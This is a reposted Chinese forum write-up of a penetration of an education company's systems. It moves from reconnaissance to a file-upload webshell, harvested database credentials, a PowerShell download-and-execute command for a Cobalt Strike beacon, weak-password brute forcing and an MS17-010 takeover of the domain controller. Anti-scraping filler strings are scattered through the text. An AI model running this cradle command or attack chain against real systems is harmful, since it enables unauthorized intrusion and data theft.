找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2551|回复: 0
打印 上一主题 下一主题

渗透实战 | 从外网直接打到内网全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2024-3-1 19:41:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

~# H% ]; |" F. G5 v 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路' s# h: c- F! f8 v7 y3 C. {! e. Q

! T6 I5 t0 R/ }8 O

, n6 i; W0 \0 D9 D! t  1 Z8 `& y2 X: _, U: _

. P7 f! }8 }8 R8 Z1 _

8 P- F* D8 f& [, A- v( I" K' f& \ 正文 ) E# e: S9 w3 c

% U3 t) b2 M% ?5 Z4 d8 U' k p

: O; ]7 Y p, ?$ c& w+ }" K: Y  : k$ y. B8 R4 Y4 S$ `0 k- y3 |$ h

( N8 s0 x( F( \/ j/ J( H/ v+ ]

) }3 ^( N! m1 g 目标:www.xxxx.com(一家教育机构)
1 a1 P# G q! h! e+ W. d
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
, D) k7 D- Q" q" p2 b+ z* ]& X

- C' \2 d6 x+ `1 |9 d2 p! y& Q

4 y: }) q' L1 z. P6 h$ ?. L- n vshapes= ( ~+ B, s% ?- b1 g: D" V

1 |4 X x5 q9 F2 |

' z( [' Q" N! S: N" Q) \0 K8 Y 进行了简单的信息搜集
5 E* d, L) [9 m/ N
# R5 T) L* J! Y- y8 Q
& V$ [: o3 k% o; E9 J4 M8 d9 K: ?

+ S. l! W7 J. F

1 q( m! @/ u. ^0 c- m/ J 子域名搜集1 r% e: ^: `5 @2 y$ q& c

7 b! m* s S0 Q8 B+ ~" i E

+ o" u- @( Y5 [( L vshapes=$ _9 b! M1 \6 B& z: \& M3 k

9 p& ^& T# R9 D

) U* }7 q# P$ }: C. F9 C$ \ fofa找资产
- l8 x* E- B, J) E v; Y4 Q( o, f
1 C0 b0 ~8 a5 X
& E% ~# n" U" p ?9 g" L J1 L

) a; v* s* m% W5 ]: ?8 |5 U5 c. K

/ L0 \& H/ c& u* Z1 H0 l* f vshapes=& ^! g- t8 [* `# j

" u6 I. i6 w" o

6 Z% o8 P' [0 P% ? k; ^# w5 h 一共七个资产。去重之后只有两个。
7 D }0 |1 o/ [3 R+ b- ~
3 p0 s1 Y$ C \7 m
: }) k/ |1 u# F9 n9 O

0 w) L# f) X5 H) U2 ~; n9 l

9 E; t# ]$ ^7 k: k, v' B4 K 目录探测 - A" O! M0 N( q0 s7 N9 l

1 X; }4 y- E/ _' L5 H1 e) x

1 ]3 L2 M x5 n) S vshapes=& H. Z5 ?7 C! F5 A

$ T) {. R) U; c# y* q0 N

: y* @6 b" ~6 }+ Z1 N) R 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
& m9 Y( P' I: [$ P2 s5 K# a
' A. e8 q3 r o
2 @- w( b% U6 z. k. N6 {$ l

, N' q/ q# C; D& K h

* @( { D: H' E6 g 我又尝试了通过修改返回包来绕过登录界面 9 B# Q# d$ O3 g- m1 ?$ _4 [) C

5 P$ j7 A3 K! V7 H- F

) t# T4 N( H3 C- C* k, G8 P0 T vshapes=% V5 h$ o' i: w& Z; r) k& a

2 J+ X; h+ K, _1 [6 M

2 @2 g v" k" @$ N$ B- ^3 `9 w$ F% W 还是不行,尝试注入无果 0 R! L8 B" ^. Y1 H x

3 r. j: i3 H3 ^1 j! J+ x

# X( J; F) E J2 _ o2 c% o vshapes=/ e6 Q+ W ?+ @

) P; D+ k& Q: e, m

& K4 M! \7 `# z: ?) x1 S9 M 不过我目录探测出了一处Spring信息泄露
3 \% W6 J; E$ d
6 O2 r! _! P* o' @$ i
+ P. U+ X5 n! n+ e' o

: U8 X; e$ D; X

& o$ Q+ n# ?% ?: k vshapes=0 e) D" V Q' b/ y* v* [

% Z: r0 F! w0 g* j

" v0 ?; I% |$ X9 S. L 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录7 R) G( g5 ]- `1 P% [

' A! e! ?/ I7 w

3 U, y9 \$ X z6 X5 E vshapes=( e3 Y2 N5 H7 D0 R' G

5 j, o) Q3 x+ P0 s

% S/ S0 B( b& s5 p. c( X# J7 A 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。 3 K0 _5 U! x* [; M3 O

- Z; H- A8 m. O' V( Z! |

& s- v% t" o9 S0 S5 W vshapes= % i$ w/ o6 D2 z$ |" F+ w7 [. _

% l. |* `# g9 m

7 J* [+ Y- a% K+ V9 d! V# ]6 J8 j. P 获取有些师傅到这一步就手机抓包电脑测了。, d* Z! J7 w4 H3 s, |

2 v9 G) t5 H7 \5 I) T

8 q+ Z: T$ N8 t: I Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。 - m& Z& L2 m5 a. R

, A* m2 X3 v+ `5 T @' i* V% @

. B2 _9 ] k1 }3 F# | 其中在一个公众号发现了小程序,可以进行注册。# o8 G& j, j, I x

# \. s: U8 ]6 D" F. M. b r

6 t" b# e% G+ R 看到了头像上传,尝试上传获取WebShell 0 ~/ [7 H; \- Q" {; K- ^0 r- e

( u( E- X4 P m

, T. `8 X+ s$ y" f5 q vshapes= 9 r0 ~1 M% n! i

" m2 O# ^/ \$ q: D$ i- `* X0 ?

" N( Q4 _4 r4 N- R7 b4 b b0 T' @ 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问 2 t5 l! o% L. W; I6 N6 z3 y

2 @# W! x" `* U2 n& |2 o, I; B% i0 @ A

3 _, O1 |" u% x6 u vshapes= }" G M/ q8 J

& M1 w3 T! t0 x

2 ~3 B( b* M' u 然后上了大马! c5 ?! [0 j- R9 t) {; i& e

! ]: K' e4 f" t4 j0 R* b

8 l' i5 |3 e- D, O. | Q vshapes= 2 Z4 T/ \$ Z2 H) n

9 A* l1 L& J% g P2 h' {# [6 m

1 G, O( u, Q0 r6 c! V vshapes=, j' P( ?+ U+ Q) ~

5 u& p* v$ m) C; r; f! B' Z- o

. _8 ~. Z; n" ?) M; p+ z/ u: B2 l 通过翻找文件发现数据库账号密码* p( i2 K+ _0 u0 k5 t7 \

' G( k' C- D" f' J% o! o; L# R

7 y- P9 n) E) Y0 J vshapes= * T* t" H6 ^. u; y9 P3 L

6 f3 p* \; P. Z3 ^

; L3 |/ T1 C [8 G( t2 y; B# [; B --内网渗透0 R9 b- u% u0 ~, ^' L, J

/ I; n4 }$ @; w y- |9 t; O

S/ M" b: c7 R( s. @ 直接通过powershell执行 cs上线+ V$ d; t2 m1 z$ s) J+ t+ D' h

0 O* W! e E; d9 u6 Z4 Y

0 V1 Z# y/ X. P+ d8 l7 n powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" 9 v6 `4 ?" A. K" w* Z

5 m1 K5 a ^& \0 K3 k

) a. {; F$ c3 O7 s vshapes=* D! a4 E0 S2 d0 `2 h8 P. z# ?7 y% P

v4 U( M# u r9 H C

) e+ O) |2 P$ b/ [6 }' `0 H 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 ' r; s5 w6 A. r/ u

5 L. \( @# t$ U

$ c3 ^7 g- N$ a vshapes=# F6 L/ t$ j3 C, f

e6 X% J( f/ _2 ~7 t

% l Z* q9 ]4 E X 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
7 h9 k: m# h/ [* z$ J1 Y
( e% n6 t0 }+ Q
9 q. T. u/ a. l) R
/ I% m, ^9 N- E7 e* x

$ ^* O' I$ f9 F

" H& f9 O% z- ?. ]; L8 M/ `& L vshapes= / f6 D; t; M4 k. ?* G) W: S

1 Z& l" [0 U9 W5 Z4 |7 G% L

/ v; L. t/ } A 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
* _: t3 z' C( ^: T! R
9 N, N* b6 z4 f- J% s/ p0 B
7 J+ r! C7 S8 ^5 r3 c

S+ ]5 v+ @& w, r! K# l

+ u; Z( {! n A# o* @ vshapes= 5 i! y3 O3 }) E% M' N" i+ G

: a; s& | V% C/ a+ H

+ t! V X5 X% p9 |, {0 S
$ s j# Z+ w% b: v" U* @% o% M
( n+ i+ v6 b9 E# x; }# m2 V/ a
. G) C5 P+ D+ J2 o4 J; @7 E) d

; C$ U# @* x1 C& `/ l

% ]' s" v {4 q. q c  * G( \! z8 L4 B/ W

5 e' i) |' K4 a. p

' k" C; ?7 a' @' K 小结 4 p( m0 ^7 D5 k1 s+ ?; v1 \

* C* ]1 l" r* ]/ S L9 _

y5 K" b/ i9 L/ J# `3 l4 C: D# E  0 W- l+ c7 n; C

: L4 W! i: r7 ?

3 i+ I$ I/ v9 e6 Z8 O 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路! % D2 G& u: N3 |. b: H, z

" ^. N. ^- z2 ~ ?- s0 Y% k

; [: V; ]; w3 y+ U   # s0 ]7 [% m% \

. W% ?6 ]- Z( ?
    4 P( v7 |2 S' t1 d6 H0 X& J
  • ) I( W% u. ]( B: F  $ }9 ~0 }" O; B; t9 y* o
  • " U9 u, ~% F3 y! A H# O
  • 0 n3 p" @6 v7 b! j  5 o& K4 b0 o, B
  • . E3 _6 ?7 q, E/ a
+ \4 k7 m8 Q6 ]5 u

4 Z* J; x, K) @" e. v5 s, t0 @ 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html" c3 _4 ]% o9 u! w7 Q2 J7 w% g* L* f

+ Q9 j$ J/ o/ J% f* F) k

- y$ P3 R& P d% w  & B6 K& O7 N) W# w$ V: v% d

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表